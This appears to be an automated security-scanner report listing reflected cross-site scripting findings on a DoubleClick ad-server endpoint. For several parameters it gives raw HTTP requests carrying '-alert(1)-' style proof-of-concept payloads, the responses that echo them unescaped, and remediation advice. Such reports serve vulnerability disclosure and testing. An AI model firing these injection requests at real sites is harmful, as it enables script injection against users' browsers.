GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=5d0bc'-alert(1)-'4aa45ed95d4 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7855
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:03 GMT
Expires: Thu, 03 Feb 2011 16:09:03 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=5d0bc'-alert(1)-'4aa45ed95d4https://www.ally.com/bank/interest-checking-account/index.html?CP=57865897;40155604\"> ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b43"-alert(1)-"4b5b2d05a2f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=b6b43"-alert(1)-"4b5b2d05a2f HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7855
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:02 GMT
Expires: Thu, 03 Feb 2011 16:09:02 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... UzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=b6b43"-alert(1)-"4b5b2d05a2fhttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865897;40155604"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6f88'-alert(1)-'5d816f81708 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe6f88'-alert(1)-'5d816f81708&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:55 GMT
Expires: Thu, 03 Feb 2011 16:08:55 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe6f88'-alert(1)-'5d816f81708&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497\"> ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e89c3"-alert(1)-"ea8dd10c3f1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe89c3"-alert(1)-"ea8dd10c3f1&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:55 GMT
Expires: Thu, 03 Feb 2011 16:08:55 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQBe89c3"-alert(1)-"ea8dd10c3f1&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604"); var fscUrl = url; ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1934"-alert(1)-"9335474a73d was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073b1934"-alert(1)-"9335474a73d&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:00 GMT
Expires: Thu, 03 Feb 2011 16:09:00 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073b1934"-alert(1)-"9335474a73d&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0bb5'-alert(1)-'b56bd520db3 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073f0bb5'-alert(1)-'b56bd520db3&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:09:01 GMT
Expires: Thu, 03 Feb 2011 16:09:01 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073f0bb5'-alert(1)-'b56bd520db3&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\"> ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af15d"-alert(1)-"24557353392 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1af15d"-alert(1)-"24557353392&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:56 GMT
Expires: Thu, 03 Feb 2011 16:08:56 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... j0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1af15d"-alert(1)-"24557353392&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497"); var fscUrl = url; var f ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f94ae'-alert(1)-'43c15411da1 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1f94ae'-alert(1)-'43c15411da1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:56 GMT
Expires: Thu, 03 Feb 2011 16:08:56 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... j0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1f94ae'-alert(1)-'43c15411da1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23ee8'-alert(1)-'ebf157e0bd6 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q23ee8'-alert(1)-'ebf157e0bd6&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:59 GMT
Expires: Thu, 03 Feb 2011 16:08:59 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q23ee8'-alert(1)-'ebf157e0bd6&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B40155604\"> ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4ef6"-alert(1)-"6c82ad39022 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Qe4ef6"-alert(1)-"6c82ad39022&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:58 GMT
Expires: Thu, 03 Feb 2011 16:08:58 GMT
Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Qe4ef6"-alert(1)-"6c82ad39022&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4c51'-alert(1)-'a046432a509 was submitted in the sz parameter. This input was echoed unmodified in the application's response. As in the sz findings for the 728x90 tag, the payload is placed immediately after sa=l in the click= URL within the request path; the sz label reflects the scanner's handling of the semicolon-delimited path segment rather than a separate sz query parameter.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
